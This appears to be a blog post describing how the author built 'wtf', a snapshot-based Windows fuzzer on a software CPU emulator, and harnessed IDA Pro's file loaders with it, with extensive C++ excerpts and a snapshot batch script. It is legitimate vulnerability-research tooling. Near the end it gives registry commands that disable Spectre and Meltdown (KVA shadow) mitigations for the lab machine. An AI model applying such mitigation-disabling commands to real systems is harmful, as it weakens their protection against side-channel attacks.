Building a new snapshot fuzzer & fuzzing IDA

Introduction

It is January 2020 and it is this time of the year where I try to set goals for myself. I had just come back from spending Christmas with my family in France and felt fairly recharged. It always is an exciting time for me to think and plan for the year ahead; who knows maybe it'll be the year where I get good at computers I thought (spoiler alert: it wasn't).

One thing I had in the back of my mind was to develop my own custom fuzzing tooling. It was the perfect occasion to play with technologies like Windows Hypervisor platform APIs, KVM APIs but also try out what recent versions of C++ had in store. After talking with yrp604, he convinced me to write a tool that could be used to fuzz any Windows targets, user or kernel, application or service, kernel or drivers. He had done some work in this area so he could follow me along and help me out when I ran into problems.

Great, the plan was to develop this Windows snapshot-based fuzzer running the target code into some kind of environment like a VM or an emulator. It would allow the user to instrument the target the way they wanted via breakpoints and would provide basic features that you expect from a modern fuzzer: code coverage, crash detection, general mutator, cross-platform support, fast restore, etc.

Writing a tool is cool but writing a useful tool is even cooler. That's why I needed to come up with a target I could try the fuzzer against while developing it. I thought that IDA would make a good target for several reasons:

  1. It is a complex Windows user-mode application,
  2. It parses a bunch of binary files,
  3. The application is heavy and is slow to start. The snapshot approach could help fuzz it faster than traditionally,
  4. It has a bug bounty.

In this blog post, I will walk you through the birth of what the fuzz, its history, and my overall journey from zero to accomplishing my initial goals. For those that want the results before reading, you can find my findings in this Github repository: fuzzing-ida75.

There is also an excellent blog post that my good friend Markus authored on RET2 Systems' blog documenting how he used wtf to find exploitable memory corruption in a triple-A game: Fuzzing Modern UDP Game Protocols With Snapshot-based Fuzzers.

Architecture

At this point I had a pretty good idea of what the final product should look like and how a user would use wtf:

  1. The user finds a spot in the target that is close to consuming attacker-controlled data. The Windows kernel debugger is used to break at this location and put the target into the wanted state. When done, the user generates a kernel-crash dump and extracts the CPU state.
  2. The user writes a module to tell wtf how to insert a test case in the target. wtf provides basic features like reading physical and virtual memory ranges, read and write registers, etc. The user also defines exit conditions to tell the fuzzer when to stop executing test cases.
  3. wtf runs the targeted code, tracks code coverage, detects crashes, and tracks dirty memory.
  4. wtf restores the dirty physical memory from the kernel crash dump and resets the CPU state. It generates a new test case, rinse & repeat.

After laying out the plan, I realized that I didn't have code that parsed Windows kernel-crash dump which is essential for wtf. So I wrote kdmp-parser which is a C++ library that parses Windows kernel crash dumps. I wrote it myself because I couldn't find a simple drop-in library available on the shelf. Getting physical memory is not enough because I also needed to dump the CPU state as well as MSRs, etc. Thankfully yrp604 had already hacked up a Windbg Javascript extension to do the work and so I reused it bdump.js.

Once I was able to extract the physical memory & the CPU state I needed an execution environment to run my target. Again, yrp604 was working on bochscpu at the time and so I started there. bochscpu is basically bochs's CPU available from a Rust library with C bindings (yes he kindly made bindings because I didn't want to touch any Rust). It basically is a software CPU that knows how to run intel 64-bit code, knows about segmentation, rings, MSRs, etc. It also doesn't use any of bochs devices so it is much lighter. From the start, I decided that wtf wouldn't handle any devices: no disk, no screen, no mouse, no keyboards, etc.

Bochscpu 101

The first step was to load up the physical memory and configure the CPU of the execution environment. Memory in bochscpu is lazy: you start execution with no physical memory available and bochs invokes a callback of yours to tell you when the guest is accessing physical memory that hasn't been mapped. This is great because:

  1. No need to load an entire dump of memory inside the emulator when it starts,
  2. Only used memory gets mapped making the instance very light in memory usage.

I also need to introduce a few acronyms that I use everywhere:

  1. GPA: Guest physical address. This is a physical address inside the guest. The guest is what is run inside the emulator.
  2. GVA: Guest virtual address. This is guest virtual memory.
  3. HVA: Host virtual address. This is virtual memory inside the host. The host is what runs the execution environment.

To register the callback you need to invoke bochscpu_mem_missing_page. The callback receives the GPA that is being accessed and you can call bochscpu_mem_page_insert to insert an HVA page that backs a GPA into the environment. Yes, all guest physical memory is backed by regular virtual memory that the host allocates. Here is a simple example of what the wtf callback looks like:

void StaticGpaMissingHandler(const uint64_t Gpa) {
  const Gpa_t AlignedGpa = Gpa_t(Gpa).Align();
  BochsHooksDebugPrint("GpaMissingHandler: Mapping GPA {:#x} ({:#x}) ..\n",
                       AlignedGpa, Gpa);

  const void *DmpPage =
      reinterpret_cast<BochscpuBackend_t *>(g_Backend)->GetPhysicalPage(
          AlignedGpa);
  if (DmpPage == nullptr) {
    BochsHooksDebugPrint(
        "GpaMissingHandler: GPA {:#x} is not mapped in the dump.\n",
        AlignedGpa);
  }

  uint8_t *Page = (uint8_t *)aligned_alloc(Page::Size, Page::Size);
  if (Page == nullptr) {
    fmt::print("Failed to allocate memory in GpaMissingHandler.\n");
    __debugbreak();
  }

  if (DmpPage) {

    //
    // Copy the dump page into the new page.
    //

    memcpy(Page, DmpPage, Page::Size);

  } else {

    //
    // Fake it 'till you make it.
    //

    memset(Page, 0, Page::Size);
  }

  //
  // Tell bochscpu that we inserted a page backing the requested GPA.
  //

  bochscpu_mem_page_insert(AlignedGpa.U64(), Page);
}

It is simple:

  1. we allocate a page of memory with aligned_alloc as bochs requires page-aligned memory,
  2. we populate its content using the crash dump.
  3. we assume that if the guest accesses physical memory that isn't in the crash dump, it means that the OS is allocating "new" memory. We fill those pages with zeroes. We also assume that if we are wrong about that, the guest will crash in spectacular ways.

To create a context, you call bochscpu_cpu_new to create a virtual CPU and then bochscpu_cpu_set_state to set its state. This is a shortened version of LoadState:

void BochscpuBackend_t::LoadState(const CpuState_t &State) {
  bochscpu_cpu_state_t Bochs;
  memset(&Bochs, 0, sizeof(Bochs));

  Seed_ = State.Seed;
  Bochs.bochscpu_seed = State.Seed;
  Bochs.rax = State.Rax;
  Bochs.rbx = State.Rbx;
//...
  Bochs.rflags = State.Rflags;
  Bochs.tsc = State.Tsc;
  Bochs.apic_base = State.ApicBase;
  Bochs.sysenter_cs = State.SysenterCs;
  Bochs.sysenter_esp = State.SysenterEsp;
  Bochs.sysenter_eip = State.SysenterEip;
  Bochs.pat = State.Pat;
  Bochs.efer = uint32_t(State.Efer.Flags);
  Bochs.star = State.Star;
  Bochs.lstar = State.Lstar;
  Bochs.cstar = State.Cstar;
  Bochs.sfmask = State.Sfmask;
  Bochs.kernel_gs_base = State.KernelGsBase;
  Bochs.tsc_aux = State.TscAux;
  Bochs.fpcw = State.Fpcw;
  Bochs.fpsw = State.Fpsw;
  Bochs.fptw = State.Fptw;
  Bochs.cr0 = uint32_t(State.Cr0.Flags);
  Bochs.cr2 = State.Cr2;
  Bochs.cr3 = State.Cr3;
  Bochs.cr4 = uint32_t(State.Cr4.Flags);
  Bochs.cr8 = State.Cr8;
  Bochs.xcr0 = State.Xcr0;
  Bochs.dr0 = State.Dr0;
  Bochs.dr1 = State.Dr1;
  Bochs.dr2 = State.Dr2;
  Bochs.dr3 = State.Dr3;
  Bochs.dr6 = State.Dr6;
  Bochs.dr7 = State.Dr7;
  Bochs.mxcsr = State.Mxcsr;
  Bochs.mxcsr_mask = State.MxcsrMask;
  Bochs.fpop = State.Fpop;

#define SEG(_Bochs_, _Whv_)                                                    \
  {                                                                            \
    Bochs._Bochs_.attr = State._Whv_.Attr;                                     \
    Bochs._Bochs_.base = State._Whv_.Base;                                     \
    Bochs._Bochs_.limit = State._Whv_.Limit;                                   \
    Bochs._Bochs_.present = State._Whv_.Present;                               \
    Bochs._Bochs_.selector = State._Whv_.Selector;                             \
  }

  SEG(es, Es);
  SEG(cs, Cs);
  SEG(ss, Ss);
  SEG(ds, Ds);
  SEG(fs, Fs);
  SEG(gs, Gs);
  SEG(tr, Tr);
  SEG(ldtr, Ldtr);

#undef SEG

#define GLOBALSEG(_Bochs_, _Whv_)                                              \
  {                                                                            \
    Bochs._Bochs_.base = State._Whv_.Base;                                     \
    Bochs._Bochs_.limit = State._Whv_.Limit;                                   \
  }

  GLOBALSEG(gdtr, Gdtr);
  GLOBALSEG(idtr, Idtr);

  // ...
  bochscpu_cpu_set_state(Cpu_, &Bochs);
}

In order to register various hooks, you need a chain of bochscpu_hooks_t structures. For example, wtf registers them like this:

//
// Prepare the hooks.
//

Hooks_.ctx = this;
Hooks_.after_execution = StaticAfterExecutionHook;
Hooks_.before_execution = StaticBeforeExecutionHook;
Hooks_.lin_access = StaticLinAccessHook;
Hooks_.interrupt = StaticInterruptHook;
Hooks_.exception = StaticExceptionHook;
Hooks_.phy_access = StaticPhyAccessHook;
Hooks_.tlb_cntrl = StaticTlbControlHook;

I don't want to describe every hook but we get notified every time an instruction is executed and every time physical or virtual memory is accessed. The hooks are documented in instrumentation.txt if you are curious. As an example, this is the mechanism used to provide full system code coverage:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  //
  // Keep track of new code coverage or log into the trace file.
  //

  const auto &Res = AggregatedCodeCoverage_.emplace(Rip);
  if (Res.second) {
    LastNewCoverage_.emplace(Rip);
  }

  // ...
}

Once the hook chain is configured, you start execution of the guest with bochscpu_cpu_run:

//
// Lift off.
//

bochscpu_cpu_run(Cpu_, HookChain_);

Great, we're now pros and we can run some code!

Building the basics

In this part, I focus on the various fundamental blocks that we need to develop for the fuzzer to work and be useful.

Memory access facilities

As mentioned in the introduction, the user needs to tell the fuzzer how to insert a test case into its target. As a result, the user needs to be able to read & write physical and virtual memory.

Let's start with the easy one. To write into guest physical memory we need to find the backing HVA page. bochscpu uses a dictionary to map GPA to HVA pages that we can query using bochscpu_mem_phy_translate. Keep in mind that two adjacent GPA pages are not necessarily adjacent in the host address space, that is why writing across two pages needs extra care.

Writing to virtual memory is trickier because we need to know the backing GPAs. This means emulating the MMU and parsing the page tables. This gives us GPAs and we know how to write in this space. Same as above, writing across two pages needs extra care.

Instrumenting execution flow

Being able to instrument the target is very important because both the user and wtf itself need this to implement features. For example, crash detection is implemented by wtf using breakpoints in strategic areas. Another example, the user might also need to skip a function call and fake a return value. Implementing breakpoints in an emulator is easy as we receive a notification when an instruction is executed. This is the perfect spot to check if we have a registered breakpoint at this address and invoke a callback if so:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  // ...

  //
  // Handle breakpoints.
  //

  if (Breakpoints_.contains(Rip)) {
    Breakpoints_.at(Rip)(this);
  }
}

Handling infinite loop

To protect the fuzzer against infinite loops, the AfterExecutionHook hook is used to count instructions. This allows us to limit test case execution:

void BochscpuBackend_t::AfterExecutionHook(/*void *Context, */ uint32_t,
                                           void *) {

  //
  // Keep track of the instructions executed.
  //

  RunStats_.NumberInstructionsExecuted++;

  //
  // Check the instruction limit.
  //

  if (InstructionLimit_ > 0 &&
      RunStats_.NumberInstructionsExecuted > InstructionLimit_) {

    //
    // If we're over the limit, we stop the cpu.
    //

    BochsHooksDebugPrint("Over the instruction limit ({}), stopping cpu.\n",
                         InstructionLimit_);
    TestcaseResult_ = Timedout_t();
    bochscpu_cpu_stop(Cpu_);
  }
}

Tracking code coverage

Again, getting full system code coverage with bochscpu is very easy thanks to the hook points. Every time an instruction is executed we add the address into a set:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  //
  // Keep track of new code coverage or log into the trace file.
  //

  const auto &Res = AggregatedCodeCoverage_.emplace(Rip);
  if (Res.second) {
    LastNewCoverage_.emplace(Rip);
  }

Tracking dirty memory

wtf tracks dirty memory to be able to restore state fast. Instead of restoring the entire physical memory, we simply restore the memory that has changed since the beginning of the execution. One of the hook points notifies us when the guest accesses memory, so it is easy to know which memory gets written to.

void BochscpuBackend_t::LinAccessHook(/*void *Context, */ uint32_t,
                                      uint64_t VirtualAddress,
                                      uint64_t PhysicalAddress, uintptr_t Len,
                                      uint32_t, uint32_t MemAccess) {

  // ...

  //
  // If this is not a write access, we don't care to go further.
  //

  if (MemAccess != BOCHSCPU_HOOK_MEM_WRITE &&
      MemAccess != BOCHSCPU_HOOK_MEM_RW) {
    return;
  }

  //
  // Adding the physical address the set of dirty GPAs.
  // We don't use DirtyVirtualMemoryRange here as we need to
  // do a GVA->GPA translation which is a bit costly.
  //

  DirtyGpa(Gpa_t(PhysicalAddress));
}

Note that accesses straddling pages aren't handled in this callback because bochs delivers one call per page. Once wtf knows which pages are dirty, restoring is easy:

bool BochscpuBackend_t::Restore(const CpuState_t &CpuState) {
  // ...
  //
  // Restore physical memory.
  //

  uint8_t ZeroPage[Page::Size];
  memset(ZeroPage, 0, sizeof(ZeroPage));
  for (const auto DirtyGpa : DirtyGpas_) {
    const uint8_t *Hva = DmpParser_.GetPhysicalPage(DirtyGpa.U64());

    //
    // As we allocate physical memory pages full of zeros when
    // the guest tries to access a GPA that isn't present in the dump,
    // we need to be able to restore those. It's easy, if the Hva is nullptr,
    // we point it to a zero page.
    //

    if (Hva == nullptr) {
      Hva = ZeroPage;
    }

    bochscpu_mem_phy_write(DirtyGpa.U64(), Hva, Page::Size);
  }

  //
  // Empty the set.
  //

  DirtyGpas_.clear();

  // ...
  return true;
}

Generic mutators

I think generic mutators are great but I didn't want to spend too much time worrying about them. Ultimately I think you get more value out of writing a domain-specific generator and building a diverse high-quality corpus. So I simply ripped off libfuzzer's and honggfuzz's.

class LibfuzzerMutator_t {
  using CustomMutatorFunc_t =
      decltype(fuzzer::ExternalFunctions::LLVMFuzzerCustomMutator);
  fuzzer::Random Rand_;
  fuzzer::MutationDispatcher Mut_;
  std::unique_ptr<fuzzer::Unit> CrossOverWith_;

public:
  explicit LibfuzzerMutator_t(std::mt19937_64 &Rng);

  size_t Mutate(uint8_t *Data, const size_t DataLen, const size_t MaxSize);
  void RegisterCustomMutator(const CustomMutatorFunc_t F);
  void SetCrossOverWith(const Testcase_t &Testcase);
};

class HonggfuzzMutator_t {
  honggfuzz::dynfile_t DynFile_;
  honggfuzz::honggfuzz_t Global_;
  std::mt19937_64 &Rng_;
  honggfuzz::run_t Run_;

public:
  explicit HonggfuzzMutator_t(std::mt19937_64 &Rng);
  size_t Mutate(uint8_t *Data, const size_t DataLen, const size_t MaxSize);
  void SetCrossOverWith(const Testcase_t &Testcase);
};

Corpus store

Code coverage in wtf is basically the fitness function. Every test case that generates new code coverage is added to the corpus. The code that keeps track of the corpus is basically a glorified list of test cases that are kept in memory.

The main loop asks for a test case from the corpus which gets mutated by one of the generic mutators and finally runs into one of the execution environments. If the test case generated new coverage it gets added to the corpus store - nothing fancy.

    //
    // If the coverage size has changed, it means that this testcase
    // provided new coverage indeed.
    //

    const bool NewCoverage = Coverage_.size() > SizeBefore;
    if (NewCoverage) {

      //
      // Allocate a test that will get moved into the corpus and maybe
      // saved on disk.
      //

      Testcase_t Testcase((uint8_t *)ReceivedTestcase.data(),
                          ReceivedTestcase.size());

      //
      // Before moving the buffer into the corpus, set up cross over with
      // it.
      //

      Mutator_->SetCrossOverWith(Testcase);

      //
      // Ready to move the buffer into the corpus now.
      //

      Corpus_.SaveTestcase(Result, std::move(Testcase));
    }
  }

  // [...]

  //
  // If we get here, it means that we are ready to mutate.
  // First thing we do is to grab a seed.
  //

  const Testcase_t *Testcase = Corpus_.PickTestcase();
  if (!Testcase) {
    fmt::print("The corpus is empty, exiting\n");
    std::abort();
  }

  //
  // If the testcase is too big, abort as this should not happen.
  //

  if (Testcase->BufferSize_ > Opts_.TestcaseBufferMaxSize) {
    fmt::print(
        "The testcase buffer len is bigger than the testcase buffer max "
        "size.\n");
    std::abort();
  }

  //
  // Copy the input in a buffer we're going to mutate.
  //

  memcpy(ScratchBuffer_.data(), Testcase->Buffer_.get(),
          Testcase->BufferSize_);

  //
  // Mutate in the scratch buffer.
  //

  const size_t TestcaseBufferSize =
      Mutator_->Mutate(ScratchBuffer_.data(), Testcase->BufferSize_,
                        Opts_.TestcaseBufferMaxSize);

  //
  // Copy the testcase in its own buffer before sending it to the
  // consumer.
  //

  TestcaseContent.resize(TestcaseBufferSize);
  memcpy(TestcaseContent.data(), ScratchBuffer_.data(), TestcaseBufferSize);

Detecting context switches

Because we are running an entire OS, we want to avoid spending time executing things that aren't of interest to our purpose. If you are fuzzing ida64.exe you don't really care about executing explorer.exe code. For this reason, we look for cr3 changes thanks to the TlbControlHook callback and stop execution if needed:

void BochscpuBackend_t::TlbControlHook(/*void *Context, */ uint32_t,
                                       uint32_t What, uint64_t NewCrValue) {

  //
  // We only care about CR3 changes.
  //

  if (What != BOCHSCPU_HOOK_TLB_CR3) {
    return;
  }

  //
  // And we only care about it when the CR3 value is actually different from
  // when we started the testcase.
  //

  if (NewCrValue == InitialCr3_) {
    return;
  }

  //
  // Stop the cpu as we don't want to be context-switching.
  //

  BochsHooksDebugPrint("The cr3 register is getting changed ({:#x})\n",
                       NewCrValue);
  BochsHooksDebugPrint("Stopping cpu.\n");
  TestcaseResult_ = Cr3Change_t();
  bochscpu_cpu_stop(Cpu_);
}

Debug symbols

Imagine yourself fuzzing a target with wtf now. You need to write a fuzzer module in order to tell wtf how to feed a testcase to your target. To do that, you might need to read some global states to retrieve some offsets of some critical structures. We've built memory access facilities so you can definitely do that but you have to hardcode addresses. This gets in the way really fast when you are taking different snapshots, porting the fuzzer to a new version of the targeted software, etc.

This was identified early on as a big pain point for the user and I needed a way to not hardcode things that didn't need to be hardcoded. To address this problem, on Windows I use the IDebugClient / IDebugControl COM objects that allow programmatic use of dbghelp and dbgeng features. You can load a crash dump, evaluate and resolve symbols, etc. This is what the Debugger_t class does.

Trace generation

The most annoying thing for me was that execution backends are extremely opaque. It is really hard to see what's going on within them. Actually, if you have ever tried to use whv / kvm APIs you probably ran into the case where the API tells you that you loaded a 'wrong' CPU state. It might be an MSR not configured right, a weird segment descriptor, etc. Figuring out where the issue comes from is both painful and frustrating.

Not knowing what's happening is also annoying when the guest is bug-checking inside the backend. To address the lack of transparency I decided to generate execution traces that I could use for debugging. It is very rudimentary yet very useful to verify that the execution inside the backend is correct. In addition to this tool, you can always modify your module to add strategic breakpoints and dump registers when you want. Those traces are pretty cool because you get to follow everything that happens in the system: from user-mode to kernel-mode, the page-fault handler, etc.

Those traces are also used to be loaded in lighthouse to analyze the coverage generated by a particular test case.

Crash detection

The last basic block that I needed was user-mode crash detection. I had done some past work in the user exception handler so I kind of knew my way around it. I decided to hook ntdll!RtlDispatchException & nt!KiRaiseSecurityCheckFailure to detect fail-fast exceptions that can be triggered from stack cookie check failure.

Harnessing IDA: walking barefoot into the desert

Once I was done writing the basic features, I started to harness IDA. I knew I wanted to target the loader plugins and based on their sizes as well as past vulnerabilities it felt like looking at ELF was my best chance.

I initially started to harness IDA with its GUI and everything. In retrospect, this was bonkers as I remember handling tons of weird things related to Qt and win32k. After a few weeks of making progress here and there I realized that IDA had a few options to make my life easier:

  • IDA_NO_HISTORY=1 meant that I didn't have to handle as many registry accesses,
  • The -B option allows running IDA in batch-mode from the command line,
  • TVHEADLESS=1 also helped a lot regarding GUI/Qt stuff I was working around.

Some of those options were documented later this year by Igor in this blog post: Igor’s tip of the week #08: Batch mode under the hood.

Inserting test case

After finding out those it immediately felt like harnessing was possible again. The main problem I had was that IDA reads the input file lazily via fread, fseek, etc. It also reads a bunch of other things like configuration files, the license file, etc.

To be able to deliver my test cases I implemented a layer of hooks that allowed me to pass through file i/o from the guest to my host. This allowed me to read my IDA license keys, the configuration files as well as my input. It also meant that I could sink file writes made to the .id0, .id1, .nam, and all the files that IDA generates that I didn't care about. This was quite a bit of work and it was not really fun work either.

I was not a big fan of this pass through layer because I was worried that a bug in my code could mean overwriting files on my host or lead to that kind of badness. That is why I decided to replace this pass-through layer by reading from memory buffers. During startup, wtf reads the actual files into buffers and the file-system hooks deliver the bytes as needed. You can see this work in fshooks.cc.

This is an example of what this layer allowed me to do:

bool Ida64ConfigureFsHandleTable(const fs::path &GuestFilesPath) {

  //
  // Those files are files we want to redirect to host files. When there is
  // a hooked i/o targeted to one of them, we deliver the i/o on the host
  // by calling the appropriate syscalls and proxy back the result to the
  // guest.
  //

  const std::vector<std::u16string> GuestFiles = {
      uR"(\??\C:\Program Files\IDA Pro 7.5\ida.key)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\ida.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\noret.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\pe.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\plugins\plugins.cfg)"};

  for (const auto &GuestFile : GuestFiles) {
    const size_t LastSlash = GuestFile.find_last_of(uR"(\)");
    if (LastSlash == GuestFile.npos) {
      fmt::print("Expected a / in {}\n", u16stringToString(GuestFile));
      return false;
    }

    const std::u16string GuestFilename = GuestFile.substr(LastSlash + 1);
    const fs::path HostFile(GuestFilesPath / GuestFilename);

    size_t BufferSize = 0;
    const auto Buffer = ReadFile(HostFile, BufferSize);
    if (Buffer == nullptr || BufferSize == 0) {
      fmt::print("Expected to find {}.\n", HostFile.string());
      return false;
    }

    g_FsHandleTable.MapExistingGuestFile(GuestFile.c_str(), Buffer.get(),
                                         BufferSize);
  }

  g_FsHandleTable.MapExistingWriteableGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id0)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id1)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.nam)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id2)");

  //
  // Those files are files we want to pretend that they don't exist in the
  // guest.
  //

  const std::vector<std::u16string> NotFounds = {
      uR"(\??\C:\Program Files\IDA Pro 7.5\ida64.int)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\idsnames)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc6.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc9.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\flirt.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\geos.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\linux.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\os2.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\win.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\win7.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\wince.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\loaders\hppacore.idc)",
      uR"(\??\C:\Users\over\AppData\Roaming\Hex-Rays\IDA Pro\proccache64.lst)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\Latin_1.clt)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\dwarf.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\atrap.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\hpux.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\i960.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\goodname.cfg)"};

  for (const std::u16string &NotFound : NotFounds) {
    g_FsHandleTable.MapNonExistingGuestFile(NotFound.c_str());
  }

  g_FsHandleTable.SetBlacklistDecisionHandler([](const std::u16string &Path) {
    // \ids\pc\api-ms-win-core-profile-l1-1-0.idt
    // \ids\api-ms-win-core-profile-l1-1-0.idt
    // \sig\pc\vc64seh.sig
    // \til\pc\gnulnx_x64.til
    // 6ba8075c8f243566350f741c7d6e9318089add.debug
    const bool IsIdt = Path.ends_with(u".idt");
    const bool IsIds = Path.ends_with(u".ids");
    const bool IsSig = Path.ends_with(u".sig");
    const bool IsTil = Path.ends_with(u".til");
    const bool IsDebug = Path.ends_with(u".debug");
    const bool Blacklisted = IsIdt || IsIds || IsSig || IsTil || IsDebug;

    if (Blacklisted) {
      return true;
    }

    //
    // The parser can invoke ida64!import_module to have the user select
    // a file that gets imported by the binary currently analyzed. This is
    // fine if the import directory is well formated, when it's not it
    // potentially uses garbage in the file as a path name. Strategy here
    // is to block the access if the path is not ASCII.
    //

    for (const auto &C : Path) {
      if (isascii(C)) {
        continue;
      }

      DebugPrint("Blocking a weird NtOpenFile: {}\n", u16stringToString(Path));
      return true;
    }

    return false;
  });

  return true;
}

Although this was probably the most annoying problem to deal with, I had to deal with tons more. I've decided to walk you through some of them.

Problem 1: Pre-load dlls

For IDA to know which loader is the right loader to use it loads all of them and asks them if they know what this file is. Remember that there is no disk when running in wtf so loading a DLL is a problem.

This problem was solved by injecting the DLLs with inject into IDA before generating the snapshot so that when it loads them it doesn't generate file i/o. The same problem happens with delay-loaded DLLs.

Problem 2: Paged-out memory

On Windows, memory can be swapped out and written to disk into the pagefile.sys file. When somebody accesses memory that has been paged out, the access triggers a #PF which the page fault handler resolves by loading the page back up from the pagefile. But again, this generates file i/o.

I solved this problem for user-mode with lockmem which is a small utility that locks all virtual memory ranges into the process working set. As an example, this is the script I used to snapshot IDA and it highlights how I used both inject and lockmem:

set BASE_DIR=C:\Program Files\IDA Pro 7.5
set PLUGINS_DIR=%BASE_DIR%\plugins
set LOADERS_DIR=%BASE_DIR%\loaders
set PROCS_DIR=%BASE_DIR%\procs
set NTSD=C:\Users\over\Desktop\x64\ntsd.exe

REM Remove a bunch of plugins
del "%PLUGINS_DIR%\python.dll"
del "%PLUGINS_DIR%\python64.dll"
[...]
REM Turning on PH
REM 02000000 Enable page heap (full page heap)
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ida64.exe" /v "GlobalFlag" /t REG_SZ /d "0x2000000" /f
REM This is useful to disable stack-traces
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ida64.exe" /v "PageHeapFlags" /t REG_SZ /d "0x0" /f

REM History is stored in the registry and so triggers cr3 change (when attaching to Registry process VA)
set IDA_NO_HISTORY=1
REM Set up headless mode and run IDA
set TVHEADLESS=1
REM https://www.hex-rays.com/products/ida/support/idadoc/417.shtml
start /b %NTSD% -d "%BASE_DIR%\ida64.exe" -B wtf_input

REM bp ida64!init_database
REM Bump suspend count: ~0n
REM Detach: qd
REM Find process, set ba e1 on address from kdbg
REM ntsd -pn ida64.exe ; fix suspend count: ~0m
REM should break.

REM Inject the dlls.
inject.exe ida64.exe "%PLUGINS_DIR%"
inject.exe ida64.exe "%LOADERS_DIR%"
inject.exe ida64.exe "%PROCS_DIR%"
inject.exe ida64.exe "%BASE_DIR%\libdwarf.dll"

REM Lock everything
lockmem.exe ida64.exe

REM You can now reattach; and ~0m to bump down the suspend count
%NTSD% -pn ida64.exe

Problem 3: Manually soft page-fault in memory from hooks

To insert my test cases in memory I used the file system hook layer I described above as well as virtual memory facilities that we talked about earlier. Sometimes, the caller would allocate a memory buffer and call let's say fread to read the file into the buffer. When fread was invoked, my hook triggered, and sometimes calling VirtWrite would fail. After debugging and inspecting the state of the PTEs it was clear that the PTE was in an invalid state. This is explained because memory is lazy on Windows. The page fault is expected to be invoked and it will fix the PTE itself and execution carries. Because we are doing the memory write ourselves, it means that we don't generate a page fault and so the page fault handler doesn't get invoked.

To solve this, I try to do a virtual to physical translation and inspect the result. If the translation is successful it means the page tables are in a good state and I can perform the memory access. If it is not, I insert a page fault in the guest and resume execution. When execution restarts, the page fault handler runs, fixes the PTE, and returns execution to the instruction that was executing before the page fault. Because we have our hook there, we get reinvoked a second time but this time the virtual to physical translation works and we can do the memory write. Here is an example in ntdll!NtQueryAttributesFile:

if (!g_Backend->SetBreakpoint(
        "ntdll!NtQueryAttributesFile", [](Backend_t *Backend) {
          // NTSTATUS NtQueryAttributesFile(
          //  _In_  POBJECT_ATTRIBUTES      ObjectAttributes,
          //  _Out_ PFILE_BASIC_INFORMATION FileInformation
          //);
          // ...
          //
          // Ensure that the GuestFileInformation is faulted-in memory.
          //

          if (GuestFileInformation &&
              Backend->PageFaultsMemoryIfNeeded(
                  GuestFileInformation, sizeof(FILE_BASIC_INFORMATION))) {
            return;
          }

Problem 4: KVA shadow

When I snapshot IDA the CPU is in user-mode but some of the breakpoints I set up are on functions living in kernel-mode. To be able to set a breakpoint on those, wtf simply does a VirtTranslate and modifies physical memory with an int3 opcode. This is exactly what KVA Shadow prevents: the user @cr3 doesn't contain the part of the page tables that describe kernel-mode (only a few stubs) and so there is no valid translation.

To solve this I simply disabled KVA shadow with the below edits in the registry:

REM To disable mitigations for CVE-2017-5715 (Spectre Variant 2) and CVE-2017-5754 (Meltdown)
REM https://support.microsoft.com/en-us/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverride /t REG_DWORD /d 3 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverrideMask /t REG_DWORD /d 3 /f

Problem 5: Identifying bottlenecks

While developing wtf I allocated time to spend on profiling the tool under specific workload with the Intel V-Tune Profiler which is now free. If you have never used it, you really should as it is both absolutely fascinating and really useful. If you care about performance, you need to measure to understand better where you can have the most impact. Not measuring is a big mistake because you will most likely spend time changing code that might not even matter. If you try to optimize something you should also be able to measure the impact of your change.

For example, below is the V-Tune hotspot analysis report for the below invocation:

wtf.exe run --name hevd --backend whv --state targets\hevd\state --runs=100000 --input targets\hevd\crashes\crash-0xfffff764b91c0000-0x0-0xffffbf84fb10e780-0x2-0x0

vtune

